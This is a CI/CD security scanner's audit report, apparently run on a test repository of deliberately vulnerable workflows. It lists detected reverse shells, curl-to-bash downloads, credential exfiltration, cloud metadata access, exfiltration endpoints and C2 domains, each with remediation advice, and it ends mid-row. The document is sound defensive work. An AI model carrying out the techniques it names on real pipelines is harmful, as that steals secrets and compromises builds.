| Repository | unknown |
| Commit SHA | N/A |
| Branch / Ref | N/A |
| Scan Mode | audit |
| Tool Version | 4.0.0 |
| Trigger | workflow_dispatch |
| Runner OS | ubuntu-latest |
| Scanner Module | Findings |
|---|---|
| behavioral_analysis | 101 |
| compromised_actions | 69 |
| network_exfiltration | 64 |
| workflow_analysis | 35 |
| permission_audit | 29 |
| cross_platform_ci | 23 |
| reusable_workflow | 17 |
| secret_exposure | 13 |
| artifact_integrity | 12 |
| pwn_request | 11 |
| container_security | 11 |
| oidc_audit | 7 |
| cache_poisoning | 2 |
| provenance_verification | 2 |
Sorted by severity. Exempted findings shown separately below.
| Severity | Rule ID | Finding | Location | Remediation |
|---|---|---|---|---|
| ๐จ CRITICAL | SCA-COMP-SHA |
COMPROMISED SHA detected: aquasecurity/trivy-action@f77738448eec70113cf711656914b61905b3bd47
compromised_actions |
vulnerable-workflows/19-teampcp-indicators.yml | Immediately remove or update this action. Rotate all secrets that may have been exposed. Reference: aquasecurity/trivy-action Compromise (75 tags) (CVE-2026-33634) |
| ๐จ CRITICAL | SCA-COMP-SHA |
COMPROMISED SHA detected: aquasecurity/setup-trivy@8afa9b9f9183b4e00c46e2b82d34047e3c177bd0
compromised_actions |
vulnerable-workflows/19-teampcp-indicators.yml | Immediately remove or update this action. Rotate all secrets that may have been exposed. Reference: aquasecurity/setup-trivy Compromise (7 SHAs) (CVE-2026-33634) |
| ๐จ CRITICAL | SCA-098 |
Potentially compromised tag for aquasecurity/trivy-action: @master
compromised_actions |
vulnerable-workflows/23-self-hosted-runner.yml | Pin to a known-safe version: 0.35.0 |
| ๐จ CRITICAL | SCA-005 |
Pwn Request: pull_request_target checks out PR head in job 'deploy-preview'
pwn_request |
vulnerable-workflows/27-oidc-token-abuse.yml | Never checkout PR head code with pull_request_target. Use pull_request trigger instead, or if you must use pull_request_target, only checkout the base branch. |
| ๐จ CRITICAL | SCA-005 |
Pwn Request: pull_request_target checks out PR head in job 'auto-review'
pwn_request |
vulnerable-workflows/02-pwn-request.yml | Never checkout PR head code with pull_request_target. Use pull_request trigger instead, or if you must use pull_request_target, only checkout the base branch. |
| ๐จ CRITICAL | SCA-055 |
Dangerous command: Piping curl to bash
workflow_analysis |
vulnerable-workflows/37-build-system-compromise.yml | Download files, verify checksums, then execute. Never pipe remote content directly to a shell interpreter. |
| ๐จ CRITICAL | SCA-055 |
Dangerous command: Process substitution from curl
workflow_analysis |
vulnerable-workflows/37-build-system-compromise.yml | Download files, verify checksums, then execute. Never pipe remote content directly to a shell interpreter. |
| ๐จ CRITICAL | SCA-055 |
Dangerous command: Piping curl to bash
workflow_analysis |
vulnerable-workflows/37-build-system-compromise.yml | Download files, verify checksums, then execute. Never pipe remote content directly to a shell interpreter. |
| ๐จ CRITICAL | SCA-055 |
curl|bash anti-pattern detected
workflow_analysis |
vulnerable-workflows/37-build-system-compromise.yml | 1. Download the script to a file 2. Verify its SHA-256 hash against a known value 3. Then execute it |
| ๐จ CRITICAL | SCA-055 |
curl|bash anti-pattern detected
workflow_analysis |
vulnerable-workflows/37-build-system-compromise.yml | 1. Download the script to a file 2. Verify its SHA-256 hash against a known value 3. Then execute it |
| ๐จ CRITICAL | SCA-055 |
Dangerous command: Piping curl to bash
workflow_analysis |
vulnerable-workflows/15-behavioral-obfuscation.yml | Download files, verify checksums, then execute. Never pipe remote content directly to a shell interpreter. |
| ๐จ CRITICAL | SCA-055 |
Dangerous command: Piping wget to shell
workflow_analysis |
vulnerable-workflows/15-behavioral-obfuscation.yml | Download files, verify checksums, then execute. Never pipe remote content directly to a shell interpreter. |
| ๐จ CRITICAL | SCA-055 |
curl|bash anti-pattern detected
workflow_analysis |
vulnerable-workflows/15-behavioral-obfuscation.yml | 1. Download the script to a file 2. Verify its SHA-256 hash against a known value 3. Then execute it |
| ๐จ CRITICAL | SCA-022 |
Credential exfiltration: Process environment read
secret_exposure |
vulnerable-workflows/14-runtime-cryptominer.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| ๐จ CRITICAL | SCA-022 |
Credential exfiltration: Environment base64 encoded
secret_exposure |
vulnerable-workflows/17-egress-exfiltration.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| ๐จ CRITICAL | SCA-022 |
Credential exfiltration: Environment base64 encoded
secret_exposure |
vulnerable-workflows/04-network-exfiltration.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| ๐จ CRITICAL | SCA-022 |
Credential exfiltration: GitHub Actions runner process (tj-actions pattern)
secret_exposure |
vulnerable-workflows/19-teampcp-indicators.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| ๐จ CRITICAL | SCA-022 |
Credential exfiltration: GitHub Actions runner process (tj-actions pattern)
secret_exposure |
vulnerable-workflows/19-teampcp-indicators.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| ๐จ CRITICAL | SCA-022 |
Credential exfiltration: Secret detection bypass (tj-actions pattern)
secret_exposure |
vulnerable-workflows/19-teampcp-indicators.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| ๐จ CRITICAL | SCA-044 |
Hardcoded Google API Key detected
secret_exposure |
vulnerable-workflows/21-ai-credential-exposure.yml | Move this Google API Key to GitHub Secrets and reference it as ${{ secrets.SECRET_NAME }}. Rotate the exposed credential immediately. |
| ๐จ CRITICAL | SCA-044 |
Hardcoded Private Key detected
secret_exposure |
vulnerable-workflows/03-secret-exposure.yml | Move this Private Key to GitHub Secrets and reference it as ${{ secrets.SECRET_NAME }}. Rotate the exposed credential immediately. |
| ๐จ CRITICAL | SCA-022 |
Credential exfiltration: Environment base64 encoded
secret_exposure |
vulnerable-workflows/15-behavioral-obfuscation.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| ๐จ CRITICAL | SCA-022 |
Credential exfiltration: Secret detection bypass (tj-actions pattern)
secret_exposure |
vulnerable-workflows/16-gitlab-ci.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| ๐จ CRITICAL | SCA-110 |
Cloud metadata endpoint access: AWS/GCP/Azure Instance Metadata Service (IMDS)
network_exfiltration |
vulnerable-workflows/20-cloud-metadata-imds.yml | Block IMDS access (169.254.169.254). Use IMDSv2 with token requirement on AWS. Implement network policies to restrict metadata access in CI. |
| ๐จ CRITICAL | SCA-110 |
Cloud metadata endpoint access: AWS/GCP/Azure Instance Metadata Service (IMDS)
network_exfiltration |
vulnerable-workflows/20-cloud-metadata-imds.yml | Block IMDS access (169.254.169.254). Use IMDSv2 with token requirement on AWS. Implement network policies to restrict metadata access in CI. |
| ๐จ CRITICAL | SCA-110 |
Cloud metadata endpoint access: GCP Metadata endpoint
network_exfiltration |
vulnerable-workflows/20-cloud-metadata-imds.yml | Block IMDS access (169.254.169.254). Use IMDSv2 with token requirement on AWS. Implement network policies to restrict metadata access in CI. |
| ๐จ CRITICAL | SCA-110 |
Cloud metadata endpoint access: Azure IMDS endpoint
network_exfiltration |
vulnerable-workflows/20-cloud-metadata-imds.yml | Block IMDS access (169.254.169.254). Use IMDSv2 with token requirement on AWS. Implement network policies to restrict metadata access in CI. |
| ๐จ CRITICAL | SCA-037 |
Reverse shell detected: Bash /dev/tcp reverse shell
network_exfiltration |
vulnerable-workflows/17-egress-exfiltration.yml | Remove the reverse shell code. Investigate how it was introduced. Rotate all secrets and review recent workflow runs. |
| ๐จ CRITICAL | SCA-037 |
Reverse shell detected: Bash interactive reverse shell
network_exfiltration |
vulnerable-workflows/17-egress-exfiltration.yml | Remove the reverse shell code. Investigate how it was introduced. Rotate all secrets and review recent workflow runs. |
| ๐จ CRITICAL | SCA-037 |
Reverse shell detected: Bash /dev/tcp reverse shell
network_exfiltration |
vulnerable-workflows/04-network-exfiltration.yml | Remove the reverse shell code. Investigate how it was introduced. Rotate all secrets and review recent workflow runs. |
| ๐จ CRITICAL | SCA-037 |
Reverse shell detected: Bash interactive reverse shell
network_exfiltration |
vulnerable-workflows/04-network-exfiltration.yml | Remove the reverse shell code. Investigate how it was introduced. Rotate all secrets and review recent workflow runs. |
| ๐จ CRITICAL | SCA-037 |
Reverse shell detected: Netcat reverse shell
network_exfiltration |
vulnerable-workflows/04-network-exfiltration.yml | Remove the reverse shell code. Investigate how it was introduced. Rotate all secrets and review recent workflow runs. |
| ๐จ CRITICAL | SCA-037 |
Reverse shell detected: Python socket reverse shell
network_exfiltration |
vulnerable-workflows/04-network-exfiltration.yml | Remove the reverse shell code. Investigate how it was introduced. Rotate all secrets and review recent workflow runs. |
| ๐จ CRITICAL | SCA-094 |
TeamPCP C2 communication: TeamPCP C2 domain (typosquat of aquasecurity)
network_exfiltration |
vulnerable-workflows/19-teampcp-indicators.yml | Block all access. Assume full credential compromise. Rotate ALL secrets immediately. |
| ๐จ CRITICAL | SCA-094 |
TeamPCP C2 communication: TeamPCP C2 base domain
network_exfiltration |
vulnerable-workflows/19-teampcp-indicators.yml | Block all access. Assume full credential compromise. Rotate ALL secrets immediately. |
| ๐จ CRITICAL | SCA-094 |
TeamPCP C2 communication: TeamPCP ICP fallback C2
network_exfiltration |
vulnerable-workflows/19-teampcp-indicators.yml | Block all access. Assume full credential compromise. Rotate ALL secrets immediately. |
| ๐จ CRITICAL | SCA-039 |
Data exfiltration endpoint: webhook.site
network_exfiltration |
vulnerable-workflows/15-behavioral-obfuscation.yml | Remove access to webhook.site. Investigate when this was added. Rotate all secrets that may have been exposed. |
| ๐จ CRITICAL | SCA-039 |
Data exfiltration endpoint: requestbin.net
network_exfiltration |
vulnerable-workflows/15-behavioral-obfuscation.yml | Remove access to requestbin.net. Investigate when this was added. Rotate all secrets that may have been exposed. |
| ๐จ CRITICAL | SCA-109 |
Egress anomaly: wget pipe-to-shell
network_exfiltration |
vulnerable-workflows/15-behavioral-obfuscation.yml | Use StepSecurity Harden-Runner for network egress monitoring. Block outbound traffic to non-allowed endpoints. If this is a legitimate domain, add it to .scg-config.yml egress_allowlist. |
| ๐จ CRITICAL | SCA-039 |
Data exfiltration endpoint: webhook.site
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to webhook.site. Investigate when this was added. Rotate all secrets that may have been exposed. |
| ๐จ CRITICAL | SCA-039 |
Data exfiltration endpoint: requestbin.com
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to requestbin.com. Investigate when this was added. Rotate all secrets that may have been exposed. |
| ๐จ CRITICAL | SCA-039 |
Data exfiltration endpoint: pipedream.net
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to pipedream.net. Investigate when this was added. Rotate all secrets that may have been exposed. |
| ๐จ CRITICAL | SCA-063 |
Possible OIDC token forwarding to external endpoint
oidc_audit |
vulnerable-workflows/10-oidc-abuse.yml | Never forward OIDC tokens manually. Use official cloud provider actions for authentication. |
| ๐จ CRITICAL | SCA-063 |
Possible OIDC token forwarding to external endpoint
oidc_audit |
vulnerable-workflows/27-oidc-token-abuse.yml | Never forward OIDC tokens manually. Use official cloud provider actions for authentication. |
| ๐จ CRITICAL | SCA-064 |
Wildcard OIDC audience configured
oidc_audit |
vulnerable-workflows/27-oidc-token-abuse.yml | Set a specific audience value matching only your intended cloud provider. |
| ๐จ CRITICAL | SCA-065 |
OIDC token available in pull_request_target context
oidc_audit |
vulnerable-workflows/27-oidc-token-abuse.yml | Do NOT grant id-token: write in pull_request_target workflows. Use a separate trusted workflow for cloud auth. |
| ๐จ CRITICAL | SCA-073 |
Privileged container in job 'build-container'
container_security |
vulnerable-workflows/26-container-attacks.yml | Remove --privileged. Use specific capabilities with --cap-add if needed. |
| ๐จ CRITICAL | SCA-076 |
Docker socket mount detected (container escape risk)
container_security |
vulnerable-workflows/09-container-escape.yml | Avoid mounting the Docker socket. Use Docker-in-Docker (dind) with proper isolation or rootless Docker. |
| ๐จ CRITICAL | SCA-082 |
Pipe-to-shell in Dockerfile RUN
container_security |
vulnerable-workflows/26-Dockerfile | Download scripts first, verify their checksum, then execute. |
| ๐จ CRITICAL | SCA-082 |
Pipe-to-shell in Dockerfile RUN
container_security |
vulnerable-workflows/26-Dockerfile | Download scripts first, verify their checksum, then execute. |
| ๐จ CRITICAL | SCA-BHV-CRED |
Environment piped through processing
behavioral_analysis |
vulnerable-workflows/17-egress-exfiltration.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| ๐จ CRITICAL | SCA-BHV-DYN |
Remote script fetched and executed (curl|sh)
behavioral_analysis |
vulnerable-workflows/37-build-system-compromise.yml | Never pipe downloaded content to a shell. Pin all downloads to checksums (sha256). Use official package managers instead of ad-hoc downloads. |
| ๐จ CRITICAL | SCA-BHV-DYN |
Remote script fetched and executed (curl|sh)
behavioral_analysis |
vulnerable-workflows/37-build-system-compromise.yml | Never pipe downloaded content to a shell. Pin all downloads to checksums (sha256). Use official package managers instead of ad-hoc downloads. |
| ๐จ CRITICAL | SCA-BHV-CRED |
Environment piped through processing
behavioral_analysis |
vulnerable-workflows/04-network-exfiltration.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| ๐จ CRITICAL | SCA-BHV-OBF |
Base64-decoded payload piped to shell
behavioral_analysis |
vulnerable-workflows/15-behavioral-obfuscation.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| ๐จ CRITICAL | SCA-BHV-OBF |
Long base64 literal decoded at runtime
behavioral_analysis |
vulnerable-workflows/15-behavioral-obfuscation.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| ๐จ CRITICAL | SCA-BHV-DYN |
Remote script fetched and executed (curl|sh)
behavioral_analysis |
vulnerable-workflows/15-behavioral-obfuscation.yml | Never pipe downloaded content to a shell. Pin all downloads to checksums (sha256). Use official package managers instead of ad-hoc downloads. |
| ๐จ CRITICAL | SCA-BHV-DYN |
Remote script fetched and executed (wget|sh)
behavioral_analysis |
vulnerable-workflows/15-behavioral-obfuscation.yml | Never pipe downloaded content to a shell. Pin all downloads to checksums (sha256). Use official package managers instead of ad-hoc downloads. |
| ๐จ CRITICAL | SCA-BHV-CRED |
Environment piped through processing
behavioral_analysis |
vulnerable-workflows/15-behavioral-obfuscation.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| ๐จ CRITICAL | SCA-BHV-CRED |
Environment piped through processing
behavioral_analysis |
vulnerable-workflows/15-behavioral-obfuscation.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| ๐จ CRITICAL | SCA-BHV-TRUST |
Docker root filesystem mount
behavioral_analysis |
vulnerable-workflows/16-gitlab-ci.yml | Apply least-privilege to containers. Never use --privileged or mount the host root filesystem. Use GitHub-hosted runners for untrusted workloads. |
| ๐จ CRITICAL | SCA-BHV-TRUST |
Container / namespace escape utility
behavioral_analysis |
vulnerable-workflows/16-gitlab-ci.yml | Apply least-privilege to containers. Never use --privileged or mount the host root filesystem. Use GitHub-hosted runners for untrusted workloads. |
| ๐จ CRITICAL | SCA-BHV-CRED |
Environment piped through processing
behavioral_analysis |
vulnerable-workflows/16-gitlab-ci.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| ๐จ CRITICAL | SCA-105 |
[JENKINS] Echo of secret variable
cross_platform_ci |
vulnerable-workflows/16-Jenkinsfile | Review and remediate this jenkins configuration issue. |
| ๐จ CRITICAL | SCA-105 |
[JENKINS] Secret passed to curl
cross_platform_ci |
vulnerable-workflows/16-Jenkinsfile | Review and remediate this jenkins configuration issue. |
| ๐จ CRITICAL | SCA-105 |
[JENKINS] Echo of secret variable
cross_platform_ci |
vulnerable-workflows/16-Jenkinsfile | Review and remediate this jenkins configuration issue. |
| ๐จ CRITICAL | SCA-106 |
[GITLAB] Echo of CI_JOB_TOKEN
cross_platform_ci |
vulnerable-workflows/16-gitlab-ci.yml | Review and remediate this gitlab configuration issue. |
| ๐จ CRITICAL | SCA-106 |
[GITLAB] Echo of CI_REGISTRY_PASSWORD
cross_platform_ci |
vulnerable-workflows/16-gitlab-ci.yml | Review and remediate this gitlab configuration issue. |
| ๐จ CRITICAL | SCA-106 |
[GITLAB] Echo of CI_JOB_TOKEN
cross_platform_ci |
vulnerable-workflows/16-gitlab-ci.yml | Review and remediate this gitlab configuration issue. |
| ๐จ CRITICAL | SCA-106 |
[GITLAB] PRIVATE_TOKEN passed to curl
cross_platform_ci |
vulnerable-workflows/16-gitlab-ci.yml | Review and remediate this gitlab configuration issue. |
| ๐จ CRITICAL | SCA-107 |
[CIRCLECI] Echo of CIRCLE_TOKEN
cross_platform_ci |
vulnerable-workflows/31-circleci-config.yml | Review and remediate this circleci configuration issue. |
| ๐จ CRITICAL | SCA-107 |
[CIRCLECI] Echo of CIRCLE_TOKEN
cross_platform_ci |
vulnerable-workflows/31-circleci-config.yml | Review and remediate this circleci configuration issue. |
| ๐จ CRITICAL | SCA-108 |
[AZURE] Echo of System.AccessToken
cross_platform_ci |
vulnerable-workflows/30-azure-pipelines.yml | Review and remediate this azure configuration issue. |
| ๐จ CRITICAL | SCA-108 |
[AZURE] Echo of secret variable
cross_platform_ci |
vulnerable-workflows/30-azure-pipelines.yml | Review and remediate this azure configuration issue. |
| ๐จ CRITICAL | SCA-108 |
[AZURE] Echo of secret variable
cross_platform_ci |
vulnerable-workflows/30-azure-pipelines.yml | Review and remediate this azure configuration issue. |
| ๐จ CRITICAL | SCA-108 |
[AZURE] System.AccessToken in curl
cross_platform_ci |
vulnerable-workflows/30-azure-pipelines.yml | Review and remediate this azure configuration issue. |
| ๐จ CRITICAL | SCA-108 |
[AZURE] Echo of System.AccessToken
cross_platform_ci |
vulnerable-workflows/30-azure-pipelines.yml | Review and remediate this azure configuration issue. |
| Severity | Rule ID | Finding | Location | Remediation |
|---|---|---|---|---|
| โ ๏ธ HIGH | SCA-COMP-TAG |
Previously-compromised action used with mutable tag: Checkmarx/kics-github-action@v2
compromised_actions |
vulnerable-workflows/19-teampcp-indicators.yml | Pin to a verified commit SHA or remove this action entirely. Attack reference: Checkmarx KICS GitHub Action Compromise (TeamPCP) (N/A) |
| โ ๏ธ HIGH | SCA-COMP-TAG |
Previously-compromised action used with mutable tag: Checkmarx/kics-github-action@v2
compromised_actions |
vulnerable-workflows/19-teampcp-indicators.yml | Pin to a verified commit SHA or remove this action entirely. Attack reference: Checkmarx KICS GitHub Action Compromise (TeamPCP) (N/A) |
| โ ๏ธ HIGH | SCA-COMP-TAG |
Previously-compromised action used with mutable tag: aquasecurity/trivy-action@master
compromised_actions |
vulnerable-workflows/23-self-hosted-runner.yml | Pin to a verified commit SHA or remove this action entirely. Attack reference: aquasecurity/trivy-action Compromise (75 tags) (CVE-2026-33634) |
| โ ๏ธ HIGH | SCA-COMP-TAG |
Previously-compromised action used with mutable tag: reviewdog/action-eslint@fff29c5
compromised_actions |
vulnerable-workflows/01-compromised-action.yml | Pin to a verified commit SHA or remove this action entirely. Attack reference: reviewdog Supply Chain Attack (CVE-2025-30154) |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: Issue title
pwn_request |
vulnerable-workflows/24-output-injection.yml | Pass Issue title as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: PR body
pwn_request |
vulnerable-workflows/24-output-injection.yml | Pass PR body as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: Head ref branch name
pwn_request |
vulnerable-workflows/24-output-injection.yml | Pass Head ref branch name as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: PR title
pwn_request |
vulnerable-workflows/24-output-injection.yml | Pass PR title as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: Head ref branch name
pwn_request |
vulnerable-workflows/24-output-injection.yml | Pass Head ref branch name as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: PR body
pwn_request |
vulnerable-workflows/24-output-injection.yml | Pass PR body as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: PR title
pwn_request |
vulnerable-workflows/02-pwn-request.yml | Pass PR title as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: PR title
pwn_request |
vulnerable-workflows/02-pwn-request.yml | Pass PR title as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: PR body
pwn_request |
vulnerable-workflows/02-pwn-request.yml | Pass PR body as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-035 |
Self-hosted runner in job 'build-on-self-hosted'
workflow_analysis |
vulnerable-workflows/23-self-hosted-runner.yml | Use ephemeral runners (GitHub-hosted or auto-scaling). Never use self-hosted runners for public repositories. If self-hosted runners are required, use container isolation. |
| โ ๏ธ HIGH | SCA-035 |
Self-hosted runner in job 'test-on-self-hosted'
workflow_analysis |
vulnerable-workflows/23-self-hosted-runner.yml | Use ephemeral runners (GitHub-hosted or auto-scaling). Never use self-hosted runners for public repositories. If self-hosted runners are required, use container isolation. |
| โ ๏ธ HIGH | SCA-027 |
Unsanitized data written to GITHUB_ENV
workflow_analysis |
vulnerable-workflows/24-output-injection.yml | Use heredoc delimiters for multi-line values. Sanitize input before writing to GITHUB_ENV. |
| โ ๏ธ HIGH | SCA-027 |
Unsanitized data written to GITHUB_ENV
workflow_analysis |
vulnerable-workflows/24-output-injection.yml | Use heredoc delimiters for multi-line values. Sanitize input before writing to GITHUB_ENV. |
| โ ๏ธ HIGH | SCA-027 |
Unsanitized data written to GITHUB_ENV
workflow_analysis |
vulnerable-workflows/02-pwn-request.yml | Use heredoc delimiters for multi-line values. Sanitize input before writing to GITHUB_ENV. |
| โ ๏ธ HIGH | SCA-084 |
Reusable workflow called with mutable ref: org-name/shared-workflows/.github/workflows/deploy.yml@main
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: org-name/shared-workflows/.github/workflows/deploy.yml@<sha> |
| โ ๏ธ HIGH | SCA-086 |
All secrets inherited by reusable workflow in 'deploy-staging'
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pass only the specific secrets needed: secrets: { MY_SECRET: ${{ secrets.MY_SECRET }} } |
| โ ๏ธ HIGH | SCA-084 |
Reusable workflow called with mutable ref: external-security-org/scanners/.github/workflows/sast.yml@v2
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: external-security-org/scanners/.github/workflows/sast.yml@<sha> |
| โ ๏ธ HIGH | SCA-086 |
All secrets inherited by reusable workflow in 'security-scan'
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pass only the specific secrets needed: secrets: { MY_SECRET: ${{ secrets.MY_SECRET }} } |
| โ ๏ธ HIGH | SCA-084 |
Reusable workflow called with mutable ref: org-name/shared-workflows/.github/workflows/build.yml@main
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: org-name/shared-workflows/.github/workflows/build.yml@<sha> |
| โ ๏ธ HIGH | SCA-084 |
Reusable workflow called with mutable ref: org-name/shared-workflows/.github/workflows/release.yml@main
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: org-name/shared-workflows/.github/workflows/release.yml@<sha> |
| โ ๏ธ HIGH | SCA-086 |
All secrets inherited by reusable workflow in 'elevated-workflow'
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pass only the specific secrets needed: secrets: { MY_SECRET: ${{ secrets.MY_SECRET }} } |
| โ ๏ธ HIGH | SCA-084 |
Reusable workflow called with mutable ref: random-external-org/shared-workflows/.github/workflows/scan.yml@main
reusable_workflow |
vulnerable-workflows/12-reusable-workflow-trust.yml | Pin to a full commit SHA: random-external-org/shared-workflows/.github/workflows/scan.yml@<sha> |
| โ ๏ธ HIGH | SCA-086 |
All secrets inherited by reusable workflow in 'security-scan'
reusable_workflow |
vulnerable-workflows/12-reusable-workflow-trust.yml | Pass only the specific secrets needed: secrets: { MY_SECRET: ${{ secrets.MY_SECRET }} } |
| โ ๏ธ HIGH | SCA-084 |
Reusable workflow called with mutable ref: another-org/deploy-workflows/.github/workflows/deploy.yml@develop
reusable_workflow |
vulnerable-workflows/12-reusable-workflow-trust.yml | Pin to a full commit SHA: another-org/deploy-workflows/.github/workflows/deploy.yml@<sha> |
| โ ๏ธ HIGH | SCA-034 |
Workflow uses 'permissions: write-all'
permission_audit |
vulnerable-workflows/35-dispatch-codeowners.yml | Replace 'write-all' with specific scopes needed by the workflow. |
| โ ๏ธ HIGH | SCA-034 |
Workflow uses 'permissions: write-all'
permission_audit |
vulnerable-workflows/19-teampcp-indicators.yml | Replace 'write-all' with specific scopes needed by the workflow. |
| โ ๏ธ HIGH | SCA-034 |
Workflow uses 'permissions: write-all'
permission_audit |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Replace 'write-all' with specific scopes needed by the workflow. |
| โ ๏ธ HIGH | SCA-034 |
Workflow uses 'permissions: write-all'
permission_audit |
vulnerable-workflows/23-self-hosted-runner.yml | Replace 'write-all' with specific scopes needed by the workflow. |
| โ ๏ธ HIGH | SCA-034 |
Workflow uses 'permissions: write-all'
permission_audit |
vulnerable-workflows/24-output-injection.yml | Replace 'write-all' with specific scopes needed by the workflow. |
| โ ๏ธ HIGH | SCA-034 |
Workflow uses 'permissions: write-all'
permission_audit |
vulnerable-workflows/28-artifact-attacks.yml | Replace 'write-all' with specific scopes needed by the workflow. |
| โ ๏ธ HIGH | SCA-034 |
Workflow uses 'permissions: write-all'
permission_audit |
vulnerable-workflows/06-permission-escalation.yml | Replace 'write-all' with specific scopes needed by the workflow. |
| โ ๏ธ HIGH | SCA-022 |
Credential exfiltration: OIDC token request access
secret_exposure |
vulnerable-workflows/10-oidc-abuse.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| โ ๏ธ HIGH | SCA-022 |
Credential exfiltration: OIDC token request access
secret_exposure |
vulnerable-workflows/27-oidc-token-abuse.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| โ ๏ธ HIGH | SCA-022 |
Credential exfiltration: OIDC token request access
secret_exposure |
vulnerable-workflows/27-oidc-token-abuse.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| โ ๏ธ HIGH | SCA-109 |
Egress anomaly: curl to raw IP address
network_exfiltration |
vulnerable-workflows/20-cloud-metadata-imds.yml | Use StepSecurity Harden-Runner for network egress monitoring. Block outbound traffic to non-allowed endpoints. If this is a legitimate domain, add it to .scg-config.yml egress_allowlist. |
| โ ๏ธ HIGH | SCA-109 |
Egress anomaly: curl to raw IP address
network_exfiltration |
vulnerable-workflows/20-cloud-metadata-imds.yml | Use StepSecurity Harden-Runner for network egress monitoring. Block outbound traffic to non-allowed endpoints. If this is a legitimate domain, add it to .scg-config.yml egress_allowlist. |
| โ ๏ธ HIGH | SCA-038 |
DNS exfiltration: nslookup with variable (potential exfil)
network_exfiltration |
vulnerable-workflows/17-egress-exfiltration.yml | Review DNS-related commands. Restrict DNS resolution in CI if possible. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: codecov.io
network_exfiltration |
vulnerable-workflows/37-build-system-compromise.yml | Remove access to codecov.io. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: codecov.io
network_exfiltration |
vulnerable-workflows/37-build-system-compromise.yml | Remove access to codecov.io. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: codecov.io
network_exfiltration |
vulnerable-workflows/37-build-system-compromise.yml | Remove access to codecov.io. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: polyfill.io
network_exfiltration |
vulnerable-workflows/37-build-system-compromise.yml | Remove access to polyfill.io. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: polyfill.io
network_exfiltration |
vulnerable-workflows/37-build-system-compromise.yml | Remove access to polyfill.io. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: polyfill.io
network_exfiltration |
vulnerable-workflows/37-build-system-compromise.yml | Remove access to polyfill.io. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: cdn.polyfill.io
network_exfiltration |
vulnerable-workflows/37-build-system-compromise.yml | Remove access to cdn.polyfill.io. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-038 |
DNS exfiltration: nslookup with variable (potential exfil)
network_exfiltration |
